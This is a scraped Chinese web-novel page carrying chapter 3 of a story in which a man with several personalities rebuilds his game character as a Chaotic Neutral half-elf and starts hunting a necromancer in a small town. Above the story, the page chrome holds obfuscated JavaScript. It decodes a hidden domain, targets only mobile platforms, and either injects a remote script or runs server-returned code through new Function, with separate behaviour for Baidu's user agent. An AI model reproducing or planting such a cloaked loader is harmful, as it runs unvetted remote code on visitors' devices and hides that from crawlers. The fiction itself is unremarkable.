98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第三章:混乱中立的檀莫(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

大多数人格分裂在发作、转换时都是毫无征兆的,不过在墨檀多年来有意识的训练后,现在他已经能够给自己争取出大概五分钟左右的缓冲时间了,这是不容小窥的五分钟,也是让他不会被扭送进精神病院的无数个关键的五分钟。

在这段时间里,他会十分短暂的同时具有两个人格,并且即将表现出来的那个会第一时间压制住自己明显异样的性格与情绪,平稳的进行一个过渡……

毕竟,无论哪一种人格其实都是墨檀自己,共享着同样的记忆、身份与智慧,尽管个性不同,但也并不是几个完全不同却被硬塞进同一个驱壳中的人。

严格来说,是四种。

第一种人格,是墨檀后期塑造出来的,性格相对中庸温和,有着跟同龄人一样的兴趣爱好,比较细心,也有那么几个性格合得来的普通朋友,也是之前在【无罪之界】中那个绝对中立的黑梵。

第二种人格则拥有着一个思想游离在无数频道的性格,与前者不同,他的一切所作所为都没有任何目的性,如果非要说想得到什么的话,就只有他口中那说不清道不明的喜悦与满足感了,如果换一个年代出生,这种人不是一个游戏人间的放荡浪子,就是一个又疯又颠的恐怖分子或革命者。

第三种人格不大好说,说圣母吧,毕竟墨檀是个男的,说圣爹吧,又有侵权的嫌疑,总之就是一个各种意义上的道德标兵,嫉恶如仇这种事儿就别说了,墨檀要是能一直保持这个人格的话,再凭借着他的智商,办张绿卡都能去万恶的资本主义国度竞选最高法院的院长了,再不济穿越一手当个惩奸除恶的圣骑士也问题不大,但有一点必须要强调下,正直不代表愚直,有智慧做后盾的正义非但不会被利用,还往往可以让各种阴暗角落中的龌龊更加无所遁形。

至于最后一种……

没有人愿意去回忆,那是最开始就被墨檀自己封印起来的人格,它或许确实存在着,但却是最没有必要存在的一个,无论哪一种性格的墨檀在这一点都有着绝对的共识。

言归正传……

墨檀之前并非没有玩过精神模拟类游戏的经历,只不过因为他在性格转换的时候精神会出现剧烈波动,哪怕能有五分钟的缓冲时间,但过后他还是会被强行断开连接,而这次,无论是开头还是结尾,他都没有猜中。

断开连接没有错,但却是没有缓冲的瞬间断连。

重新登录也没有错,但他却被系统提示重新进行角色创建流程……

“哈哈哈哈~!这简直是太有趣了!”第二次站在石台上环视着周围那一片虚无的墨檀愣了半响后竟然开始放声大笑:“这个游戏尽管并没有让我找到什么‘真我’,但却是出奇的有趣啊!!”

仿佛既视感一般,九扇大门从天而降。

这次的墨檀却没有丝毫犹豫,直接走到了那之前他尝试过的,上面写着【混乱中立】的大门前,轻笑道:“打开。”

轰隆隆!!

仿佛期待已久一般,那扇门颤抖着敞开了,飞速打开的门扉仿佛是在恭迎他走进去一般。

“或者说真正的‘我’……”墨檀低声笑道:“用【混乱中立】这四个字就可以直接解释了?”

他晃了晃脖子,仿佛迫不及待般地走进了大门。

系统的声音依然从一片黑暗……

【您的阵营为——混乱中立,此立场永不可逆,开始计算您的初始天赋、种族、能力】

“完全的个人主义者,躲避权威、憎恨限制、挑战传统……”墨檀轻声念着自己印象里dnd规则中对于【混乱中立】的定义:“即为‘真正的混乱’么……”

【计算完毕,您的初始人物资料为:】

种族:半精灵

性别:男

阵营:混乱中立

天赋:混乱(极端的情绪将给赋予你额外的伤害以及成功率)、狡诈(狡诈学派等级+3)、诡辩(让别人更容易相信你)

基础属性:力量4、灵巧8、智慧9、体质4

文明属性:口才8、魅力8、学识8、领导5

战斗属性:狡诈3级

“明明都是我,差距还真不是一般的大呢~”墨檀这会儿倒是没有丝毫给自己打抱不平的意思,也不知道他为啥这么高兴。

【请为您的角色命名】

“檀莫,不用再确认一次,写错了就写错了~”墨檀笑呵呵的随口说道,其实他只是想确认一下系统的智商如何,至于名字却是根本不在意。

【是否进行相貌调整?】

一个有着人类的大部分特质,只有头发与眼睛是翠绿色的纤细男子出现在墨檀面前,长得自然还是与他一模一样。

“还真没再确认名字啊,聪明~”墨檀夸赞了一句,随后说道:“大体不用改,头发给我染回黑色就行了。”

面前那半精灵模型一头修长的绿色发丝立刻变得乌黑,这次墨檀算是满意了。

【人物创建完毕,混乱中立的檀莫,欢迎来到无罪之地】

身体的控制权恢复了,既视感般的熟悉,但这一次无论是周围的环境还是墨檀自己的心态,都已经全然不同。

睁开双眼,他发现自己正置身于一条普通的小镇街道,来往的人并不多,多半是扛着锄头的耕耘者或身着简陋装备的猎手,种族十分多样化,矮人、半身人、巨魔、蜥蜴人等墨檀认识或不认识的都有,却看起来一派和谐的模样。

“啧啧,比起那个连肤色不同都可以成为攻击理由的现实,这里还真是个单纯质朴的世界呢~”墨檀一边缓缓溜达着一边低声自语道:“尽管貌似很快就会有麻烦出现了……”

之所以这么说,是因为他看到了系统赋予的引导任务。

【——在亡灵法师梅迪在枫糖镇引发骨化瘟疫前将其阻止】

怎么看怎么都不像是个正常的新手引导任务……

但墨檀却并不在意,反而还有些高兴~

“嘿!伙计!”他忽然对一个正俯身挑拣着某种红色蔬菜的人类男子打了个招呼,冲他微笑道:“可以耽误你一点时间吗?”

对方有些疑惑的看了墨檀一眼:“请问你是?”

“一个吟游诗人,来自很远的地方。”墨檀十分自然地胡扯着,随即语气忽然变得有些低沉:“当然,在开始流浪之前我也有过稳定的栖身之所,那个被称之为家的温暖地方……直到……哦,艾丽,为什么偏偏是你……”

他幽幽地叹了口气,打住了话头,随后歉然地对那个已经明显有些发懵的中年人苦笑了一声:“抱歉,我总是会不经意间想起那些事……”

“不,伙计,该说抱歉的是我。”对方一脸‘叔也有往事’的表情叹了口气:“那么,我可以帮你做些什么?”

墨檀低声道:“听说咱们枫糖镇有一个法师,如果可以的话我想跟他聊两句,毕竟诗人也有灵感枯竭的时候,那些巨龙与骑士的故事孩子们总会听腻的,所以……”

“法师?”中年人皱了皱眉,踌躇道:“我们枫糖镇?”

“我是这么听说的。”墨檀面不改色。

也许是因为他的颜艺实在太过于丰富、演技也太过于精湛,也可能是因为他那高达8点的初始魅力所致,这位原本着急买菜回家的人类大叔还挺上心,托着下巴一边思索着一边嘀咕着:“我的确不记得镇子里有一个法师……”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间